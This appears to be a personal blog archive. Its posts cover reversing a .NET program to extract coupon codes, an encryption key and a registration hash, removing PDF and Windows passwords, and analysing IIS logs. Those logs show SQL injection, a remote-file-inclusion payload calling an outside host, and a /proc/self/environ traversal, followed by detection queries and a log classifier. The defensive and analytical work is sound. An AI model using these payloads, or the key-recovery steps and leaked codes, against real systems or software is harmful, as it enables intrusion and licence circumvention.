Monday, March 16, 2015

Reversing .NET applications.



All screenshots were taken with http://getgreenshot.org. It is an amazing application, and free. If you like it, please donate.

! If you are developing a .NET application for commercial sale, you must implement protection beyond simple obfuscation. There are tools on the market that can deobfuscate .NET assemblies. One of them:

Tools


De4dot http://de4dot.com/ - a .NET deobfuscator and unpacker

FEATURES

  • Inline methods.
  • Decrypt strings statically or dynamically.
  • Decrypt constants.
  • Decrypt methods statically or dynamically.
  • Remove proxy methods.
  • Rename symbols.
  • Devirtualize virtualized code.
  • Decrypt resources.
  • Decrypt embedded files.
  • Remove tamper detection code
  • Remove anti-debug code
  • Control flow deobfuscation.
  • Restore class fields.
  • Convert a PE exe to a .NET exe.
  • Removes most/all junk classes added by the obfuscator.
  • Fixes some peverify errors.
  • Restore the types of method parameters and fields.

OBFUSCATORS / PACKERS

  • Agile.NET (aka CliSecure)
  • Babel.NET
  • CodeFort
  • CodeVeil
  • CodeWall
  • CryptoObfuscator
  • DeepSea Obfuscator
  • Dotfuscator
  • .NET Reactor
  • Eazfuscator.NET
  • Goliath.NET
  • ILProtector
  • MaxtoCode
  • MPRESS
  • Rummage
  • Skater.NET
  • SmartAssembly
  • Spices.Net
  • Xenocode


Add-ons for Reflector:
1)     If you want to modify code: http://reflexil.net/
Reflexil is an assembly editor and runs as a plug-in for Red Gate's Reflector, ILSpy and Telerik's JustDecompile. Reflexil uses Mono.Cecil, written by Jb Evain, and is able to manipulate IL code and save the modified assemblies to disk. Reflexil also supports C#/VB.NET code injection.
2)      If you need search in Reflector: http://reflectoraddins.codeplex.com/wikipage?title=CodeSearch Code Search is an add-in for .NET Reflector that allows searching within the decompiled source code.

To install add-ons:





Deobfuscating obfuscated files

1)      Download and unzip de4dot.
2)      Drag and drop the obfuscated file onto the de4dot icon.
3)      You will get TestRename-cleaned.exe.


In my case I took the file TestRename.exe and dragged and dropped it onto de4dot.exe. If you have a 64-bit application, drop it onto de4dot-x64.exe.
A couple of seconds later you will see a new file created, TestRename-cleaned.exe. This is the deobfuscated file, which you can use in Reflector.




Reflector:

You can try http://ilspy.net/ as well.

Simple way

1)      Open assembly :





Once the assembly is open, you can search through the code for "goodies":






Or you can simply export the source code to another folder and work with it in Notepad++ or another free text editor:





In my case, after exporting (decompiling) the code, I searched the exported directory for the text "License" and got a list of files containing interesting information:

In one file I found (decompiled C#):
private string GetDiscountCoupon(DiscountypeEnum dt)
{
    switch (dt)
    {
        case DiscountypeEnum.Percent10:
            return "LIZA-DPQT";

        case DiscountypeEnum.Percent15:
            return "LIZA-7XY4-IPCX";

        case DiscountypeEnum.Percent20:
            return "LIZA-AM84-XDVM";

        case DiscountypeEnum.Percent25:
            return "LIZA-R08M-AWTK";

        case DiscountypeEnum.Percent50:
            return "LIZ-R764-LPL";
    }
    return "";
}
This is the list of discount coupons, in clear text in the binary.

And in another file I found (the first method is cut off at the start of the excerpt):

    Data encryptedData = new Data {
        Hex = str2
    };
    return new Symmetric(Symmetric.Provider.TripleDES, true) { Key = { Text = "EzF6@CD4-72$C-49b3-96*-329di949mcoB49}" } }.Decrypt(encryptedData).Text;
}

public static bool RegisterApplication(string key)
{
    key = key.Trim();
    string str2 = "B4FA7A5DA5AF2E63D97F819A5362CDA0";
    Hash hash = new Hash(Hash.Provider.MD5);
    Data d = new Data(key);
    string hex = hash.Calculate(d).Hex;
    if (((str2.Length > 5) && (key.Length < 30)) && (hex == str2))
    {
        SetAppConfig("KH", hex, true);
        SetAppConfig("RD", Conversions.ToString(DateTime.Today), true);
        m_IsRegisteredProduct = 0;
        return true;
    }
    // remainder of the method is not shown in the excerpt
}
Where I found:
    string str2 = "B4FA7A5DA5AF2E63D97F819A5362CDA0";
    Hash hash = new Hash(Hash.Provider.MD5);

On the website http://www.md5online.org/, decrypting this hash revealed the registration key.
That was the easiest reversing I have ever done.
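The check above boils down to "the MD5 of the typed key must equal a constant stored in the binary", so the md5online step is a lookup against precomputed hashes, not decryption: any short, unsalted key is recoverable that way, and even a strong hash would not help much, because the comparison itself can be patched out with Reflexil. The following Python is an added example, written for this page and not code from the reversed application. It re-implements the decompiled check, shows the offline form of the lookup over a constructed candidate list, and automates the "search the exported sources for goodies" step with a few patterns for the kinds of literals found above. The hash constant is the page's; the sample source text, its placeholder hash and key values, and the DEMO-KEY candidates are constructed, and the real registration key is not known here, so a lookup against the page's constant returns None unless the key happens to be in the candidate list.

```python
import hashlib
import re

# Constant copied from the decompiled RegisterApplication() above.
EXPECTED_HEX = "B4FA7A5DA5AF2E63D97F819A5362CDA0"

# Constructed stand-in for one exported .cs file. The hash, 3DES key and coupon
# below are placeholders for the example, not the values from the real binary.
SAMPLE_SOURCE = '''public static bool RegisterApplication(string key)
{
    string str2 = "00112233445566778899AABBCCDDEEFF";
    Hash hash = new Hash(Hash.Provider.MD5);
    ...
}
return new Symmetric(Symmetric.Provider.TripleDES, true) { Key = { Text = "EXAMPLE-3DES-KEY" } }.Decrypt(encryptedData).Text;
case DiscountypeEnum.Percent10:
    return "DEMO-0000";
'''

# Literal shapes worth grepping for in decompiled sources (assumed patterns,
# chosen to match the kinds of findings on this page).
SECRET_PATTERNS = [
    ("md5-sized hex constant", re.compile(r'"([0-9A-Fa-f]{32})"')),
    ("weak hash provider", re.compile(r"Hash\.Provider\.(MD5|SHA1)")),
    ("hard-coded symmetric key", re.compile(r'Key\s*=\s*\{\s*Text\s*=\s*"([^"]+)"')),
    ("coupon/serial literal", re.compile(r'return\s+"([A-Z]{3,4}-[A-Z0-9]{4}(?:-[A-Z0-9]{3,4})*)"')),
]


def find_secret_candidates(source):
    """Scan decompiled source text; return (line_no, kind, matched value) per hit."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        for kind, rx in SECRET_PATTERNS:
            m = rx.search(line)
            if m:
                hits.append((no, kind, m.group(1) if m.groups() else m.group(0)))
    return hits


def md5_hex_upper(text):
    """MD5 of the UTF-8 bytes as upper-case hex, the form the .Hex property compares."""
    return hashlib.md5(text.encode("utf-8")).hexdigest().upper()


def register_application(key, expected_hex=EXPECTED_HEX):
    """Python re-implementation of the decompiled check: trim, hash with MD5, compare.
    The config writes (SetAppConfig) are side effects and are left out."""
    key = key.strip()
    return len(expected_hex) > 5 and len(key) < 30 and md5_hex_upper(key) == expected_hex.upper()


def recover_key(expected_hex, candidates):
    """Offline equivalent of the md5online lookup: hash each candidate and return the
    first one whose digest matches, or None. With no salt and a short key this is
    exactly as cheap as it looks."""
    for cand in candidates:
        if md5_hex_upper(cand) == expected_hex.upper():
            return cand
    return None


if __name__ == "__main__":
    for no, kind, value in find_secret_candidates(SAMPLE_SOURCE):
        print(f"line {no}: {kind}: {value}")
    wordlist = ["DEMO-KEY-2014", "DEMO-KEY-2015"]  # constructed candidates
    print("recovered:", recover_key(md5_hex_upper("DEMO-KEY-2015"), wordlist))
    print("page hash in wordlist:", recover_key(EXPECTED_HEX, wordlist))
```

A licensing scheme that survives this kind of review keeps the secret out of the client: the key carries a signature that the program verifies with an embedded public key and only the vendor can produce, so nothing in the assembly lets an attacker mint keys. Patching the verify branch remains possible, which is why obfuscation alone is not protection.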
Complicated way ( will follow )


Wednesday, January 28, 2015

Removing password from protected PDF documents

$ pdftops your_protected_pdf_document.pdf out.ps

$ ps2pdf out.ps broken_protection_pdf_document.pdf
Source: http://www.cyberciti.biz/faq/removing-password-from-pdf-on-linux/
Install the tools first: $ sudo apt-get install xpdf-utils
Then decrypt the PDF into a PostScript file:
pdftops input.pdf out.ps
You get out.ps, which can be printed or opened on Linux directly; you can also convert the .ps (PostScript) file back to a PDF:
ps2pdf out.ps ready.pdf
Please note that ps2pdf is part of Ghostscript, which is installed along with xpdf-utils.
This removes only the owner-password restrictions (printing, copying, editing). A document that asks for a password before it opens has a user password, and pdftops needs it (its -upw option) before it can produce the PostScript; qpdf does the same in one step with --decrypt plus the password.
Alternatively you can convert it with Nitro PDF https://www.gonitro.com/pro

Wednesday, January 21, 2015

Remove Admin Password from Win 7, 8, 2008 etc for free

http://pogostick.net/~pnh/ntpasswd/bootdisk.html

***************************************************************************
*                                                                         *
*         Windows Change Password / Registry Editor / Boot CD             *
*                                                                         *
*  (c) 1998-2014 Petter Nordahl-Hagen. Distributed under GNU GPL v2       *
*                                                                         *
* DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES!          *
*             THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE       *
*             CAUSED BY THE (MIS)USE OF THIS SOFTWARE                     *
*                                                                         *
* More info at: http://pogostick.net/~pnh/ntpasswd/                       *
* Email       : pnh@pogostick.net                                         *
***************************************************************************

Just boot this CD and follow instructions.
Usually, just pressing return/enter should work, except some
drivers may have to be loaded manually with the 'm' menu option after boot.

 ---

The password reset and registry edit has now been tested with the following:

NT 3.51, NT 4, Windows 2000, Windows XP, Windows 2003 Server,
Vista, Windows 7, Server 2008, Windows 8, Windows 8.1, Server 2012

As far as I know, it will work with all Service Packs (SP) and
all editions (Professional, Server, Home etc)
Also, 64 bit windows versions should be OK.

 ---

To make a bootable USB drive / key:

1. Copy all files from this CD onto the USB drive.
   It cannot be in a subdirectory on the drive.
   You do not need delete files already on the drive.
2. Install the bootloader
   On the USB drive, there should now be a file "syslinux.exe".
   Start a command line window (cmd.exe) with "run as administrator"
   From the command line, run the command like this:


j:\syslinux.exe -ma j:

replace j with some other letter if your USB drive is on another
drive letter than j:
On some drives, you may have to omit the -ma option if you
get an error.
If it says nothing, it probably did install the bootloader.

Please note that you may have to adjust settings in your computers BIOS
setup to boot from USB.
Also, some BIOS (often older machines) simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS,
and a lot of them are rather buggy when it comes to booting off different
media, so I am unable to help you.


Tuesday, January 13, 2015

Searching - Replacing in log files

A long time ago I found an amazing tool for such tasks:

http://www.mind-pioneer.com/

Here is how to extract IP addresses from a log file:

http://www.mind-pioneer.com/services/419_Text_file_parser.html


This is a short list of what you can do with IP addresses in logs:

http://www.mind-pioneer.com/services/conv_search.php?key=IP+address&type=all&x=30&y=12


Monday, January 12, 2015

How to use Log Parser Lizard




Log Parser Lizard http://www.lizard-labs.com/log_parser_lizard.aspx is a GUI for Microsoft Log Parser that gives quick query access to log files, XML files, CSV files and other data sources on Windows, so you can find exactly what you need in the logs when you need it.




1)      Click on the "IIS logs" button.
2)      Click on the "Attacks" link.
3)      Change line 3 to the path of your log location. Keep the format and do not forget to end the line with \*.log'.
4)      Click the "Run Query" button.

Predefined Queries


The following queries are the ones we use to analyse the logs, with their purpose:

Main query used for most attacks:


This query covers the following attacks: directory traversal, XSS, XSF, SQL injection and command injection. The PHP clauses catch probes aimed at PHP; we monitor those even on an ASP.NET site, because an attacker who notices that the technology is different may adapt the attack.

SELECT date AS Date, c-ip AS IP, cs-uri-stem AS URL_Address, cs-uri-query AS Attack_Details,
       count(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'
WHERE (cs-uri-query LIKE '%./%') OR (cs-uri-query LIKE '%.php%') OR (cs-uri-query LIKE '%//.%')
   OR (cs-uri-query LIKE '%src=http%') OR (cs-uri-query LIKE '%src=ftp%') OR (cs-uri-query LIKE '%l=ftp://%')
   OR (cs-uri-query LIKE '%l=http://%') OR (cs-uri-query LIKE '%SELECT%') OR (cs-uri-stem LIKE '%.php%')
GROUP BY date, c-ip, cs-uri-stem, cs-uri-query
ORDER BY date, c-ip, cs-uri-query

SQL injection attempts (by scanner user agent):

SELECT date AS Date, c-ip AS IP, cs-uri-query AS Query_Made, cs(User-Agent) AS Browser, count(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'
WHERE cs(User-Agent) LIKE '%sql%'
GROUP BY date, c-ip, cs-uri-query, cs(User-Agent)
ORDER BY date, c-ip, cs-uri-query

Query details:

·         (cs-uri-query LIKE '%./%') - matches "./" anywhere in the query string ("%" is the LIKE wildcard for any sequence of characters) - directory traversal.
·         (cs-uri-query LIKE '%.php%') - any query string containing ".php" - PHP-related probes.
·         (cs-uri-query LIKE '%//.%') - matches "//." - directory traversal.
·         (cs-uri-query LIKE '%src=http%') - a remote resource injected through a src= parameter - XSS / remote inclusion.
·         (cs-uri-query LIKE '%src=ftp%') - XSS / remote inclusion.
·         (cs-uri-query LIKE '%l=ftp://%') - XSS / remote inclusion.
·         (cs-uri-query LIKE '%l=http://%') - XSS / remote inclusion.
·         (cs-uri-query LIKE '%SELECT%') - SQL injection.

Note that IIS logs cs-uri-query as it was received, URL-encoded, and these clauses match that encoded text: a payload such as l=e%20aND%208%3D8 contains no literal SELECT and would not be selected, so treat the patterns as a first pass over the logs rather than a complete detector.





1)      Click "Export to Excel".
2)      Choose a location.
3)      Click "Save".

After that you can perform the log analysis and write the report.

IIS W3C Log Analysis




When you look into the logs there is a pattern of normal activity, and you will find it easily by just reading through them. On some servers the pattern looks like this.

2012-08-31 00:00:13 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 200 0 0 234
2012-08-31 00:00:13 198.103.***.**POST /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 302 0 0 124
2012-08-31 00:00:13 198.103.***.**GET /error/GenericErrorPage.htm aspxerrorpath=/RIR_RDI/index_e.aspx 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 404 0 2 46
2012-08-31 00:01:38 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=452642&l=e 8080 - 59.167.198.149 Mozilla/5.0+(Windows+NT+6.0;+WOW64;+rv:14.0)+Gecko/20100101+Firefox/14.0.1 200 0 0 1060
2012-08-31 00:01:40 198.103.***.**POST /Reflex/index_f.aspx - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 608
2012-08-31 00:01:40 198.103.***.**GET /style/header.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 78
2012-08-31 00:01:40 198.103.***.**GET /style/footer.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 46
2012-08-31 00:01:40 198.103.***.**GET /style/refinfo.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 31
2012-08-31 00:01:40 198.103.***.**GET /style/common.css - 8080 - 74.14.188.98

Each line of this normal traffic contains, in the W3C field order IIS uses by default: date, time, server IP (s-ip), method, URI stem, URI query, server port, user name, client IP (c-ip), user agent (the client application and OS), HTTP status, substatus, Win32 status and time taken.
Scrolling further down the logs, we can see different types of attacks.

Sample of an SQL injection attack

This one was performed by us to verify the security of the web site:

2012-07-18 17:29:33 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:34 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:50 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=4853 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

Let's make a short analysis of this injection:

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org)200 0 0 15


-          The first highlighted part is the injection attempt (the cs-uri-query field), the second is the client IP address (c-ip), and the third is the user agent, which here identifies the tool (sqlmap).
The first part is always present; it is the main evidence that an SQL injection attempt was made.
-          The second part is the IP address. We copy it and check its location at http://www.iplocation.net/.
The location helps to tell whether this is an internal test or vulnerability assessment. If it is outside YOUR network, start an investigation into whether the attack penetrated the web site.
-          For the investigation we use dedicated machines with the BackTrack distribution installed, and with SQLMAP we repeat the injection to see whether our application or network is vulnerable to it.


Keep in mind that this is just one sample of an attack; others can look different.

For other attacks, record what they look like, how they differ from the normal pattern, and the IP location.

One sample from the application event log shows a potential attack:

Exception information:     Exception type: HttpRequestValidationException    Exception message: A potentially dangerous Request.Form value was detected from the client (txtFulltext=""...jsc.djts, <a href=""http://qual...""). Request information:     Request URL: http://www.***.***:8080/RIR_RDI/index_e.aspx?n=y     Request path: /RIR_RDI/index_e.aspx     User host address: 96.47.225.66     User:      Is authenticated: False     Authentication Type:      Thread account name: IIS APPPOOL\CLFApps

The exception message says "A potentially dangerous Request.Form value was detected": this is ASP.NET request validation rejecting HTML in a submitted form field. We must still make sure it is not a repeated attempt to penetrate the web site. Unfortunately, without a sniffer we cannot see the whole submitted value (href="http://qual..."), so we cross-search the other logs for the same time. In this case a simple Google search showed that the IP address had been reported as a spam bot that submits messages into forms; as our web site has a form, the bot automatically tried to post there.

Sample of PHP remote file inclusion (RFI) / code injection (the query passes eval() and include() of an attacker-controlled URL to a PHP script; this is not cross-site scripting, even though such probes are often filed under XSS):


2012-08-16 03:40:25 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:26 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:28 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:29 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105


SQL injection (boolean-based blind probing: the same request with a true condition, 8=8, and a false one, 8=3, from the same client a second apart, behind an ordinary browser user agent):

2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%27%60%28%5B%7B%5E%7E 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 483
2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405
2012-09-05 18:18:46 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499

Directory traversal / local file inclusion attempt (the controller parameter climbs out of the web root toward /proc/self/environ; the target path does not exist on this IIS/ASP.NET server, hence the 404s):

2012-08-22 12:37:56 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:56 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:57 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78
2012-08-22 12:37:57 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78
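The following Python is an added example (written for this page, not part of the original post or of Log Parser) that runs the same detection logic offline over IIS W3C log lines. It parses the #Fields header, applies the substring patterns from the "Main query" in the Log Parser section above as a function, and then classifies each request on the URL-decoded query string into the families seen in the samples above: SQL injection, including the true/false pairs of boolean-based blind probing; PHP remote file inclusion; directory traversal; scanner user agents; and PHP probes on a non-PHP site. The log lines are constructed to mirror the samples, using RFC 5737 documentation addresses, and the field layout assumes the default IIS W3C field set.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C log, modelled on the samples above (documentation
# addresses from RFC 5737; not real traffic).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2012-07-18 17:29:52 198.51.100.10 GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 192.0.2.7 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-09-05 18:18:45 198.51.100.10 GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 192.0.2.9 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405
2012-09-05 18:18:46 198.51.100.10 GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 192.0.2.9 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499
2012-08-16 03:40:26 198.51.100.10 GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://203.0.113.5/x.jpg?? 8080 - 192.0.2.11 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1) 404 0 2 249
2012-08-22 12:37:56 198.51.100.10 GET /index.php option=com_acctexp&controller=../../../../../../proc/self/environ%00 8080 - 192.0.2.13 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1) 404 0 2 109
2012-08-31 00:01:40 198.51.100.10 GET /style/header.css - 8080 - 192.0.2.20 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1) 304 0 0 78
"""

# The LIKE clauses of the "Main query" above, as case-insensitive substrings.
PAGE_QUERY_PATTERNS = ["./", ".php", "//.", "src=http", "src=ftp", "l=ftp://", "l=http://", "select"]

# Families matched on the URL-decoded query string (assumed signatures).
SQLI_RE = re.compile(r"(?i)\b(and|or)\s+\d+\s*=\s*\d+|\bunion\b\s+(all\s+)?select|\bselect\b.+\bfrom\b|'\s*(or|and)\b")
RFI_RE = re.compile(r"(?i)\beval\(|\binclude(_once)?\(|=(https?|ftp)://")
TRAVERSAL_RE = re.compile(r"(\.\./){2,}|/proc/self/environ|/etc/passwd|\x00")
SCANNER_UA_RE = re.compile(r"(?i)sqlmap|nikto|nessus")
COMPARISON_RE = re.compile(r"(?i)\b(?:and|or)\s+(\d+)\s*=\s*(\d+)")


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields header names."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):
                rec = dict(zip(fields, values))
                # IIS writes "-" for an empty field; normalise to "" for matching.
                rec["cs-uri-query"] = "" if rec["cs-uri-query"] == "-" else rec["cs-uri-query"]
                records.append(rec)
    return records


def matches_page_query(rec):
    """True when the WHERE clause of the Log Parser query would select this record
    (it sees the raw, still URL-encoded query string, exactly as the query does)."""
    q, stem = rec["cs-uri-query"].lower(), rec["cs-uri-stem"].lower()
    return any(p in q for p in PAGE_QUERY_PATTERNS) or ".php" in stem


def classify(rec):
    """Attack families for one record, matched on the decoded query and the user agent."""
    decoded = unquote_plus(rec["cs-uri-query"])
    families = set()
    if SQLI_RE.search(decoded):
        families.add("sqli")
    if RFI_RE.search(decoded):
        families.add("rfi")
    if TRAVERSAL_RE.search(decoded):
        families.add("traversal")
    if SCANNER_UA_RE.search(rec.get("cs(User-Agent)", "")):
        families.add("scanner-ua")
    if rec["cs-uri-stem"].lower().endswith(".php"):
        families.add("php-probe")
    return families


def boolean_blind_sources(records):
    """(c-ip, stem) pairs that sent both a true (8=8) and a false (8=3) comparison,
    the signature of boolean-based blind injection that the encoded-substring
    query cannot see because neither request contains SELECT."""
    seen = defaultdict(set)
    for rec in records:
        comps = COMPARISON_RE.findall(unquote_plus(rec["cs-uri-query"]))
        if comps:
            kind = "true" if all(a == b for a, b in comps) else "false"
            seen[(rec["c-ip"], rec["cs-uri-stem"])].add(kind)
    return {key for key, kinds in seen.items() if kinds == {"true", "false"}}


def summarize(text):
    """Counter of (c-ip, family) attempts: the programmatic form of the GROUP BY."""
    counts = Counter()
    for rec in parse_w3c(text):
        for fam in classify(rec):
            counts[(rec["c-ip"], fam)] += 1
    return counts


if __name__ == "__main__":
    for (ip, fam), n in sorted(summarize(SAMPLE_LOG).items()):
        print(f"{ip:15} {fam:12} {n}")
    print("boolean-blind sources:", boolean_blind_sources(parse_w3c(SAMPLE_LOG)))
```

Running it prints per-client attempt counts and flags 192.0.2.9 as a boolean-blind source even though neither of its requests would be selected by the substring query; decoding before matching is what closes that gap, and the same decode step is worth adding to the Log Parser query (Log Parser exposes URL-decoding functions for this) before relying on it for reporting.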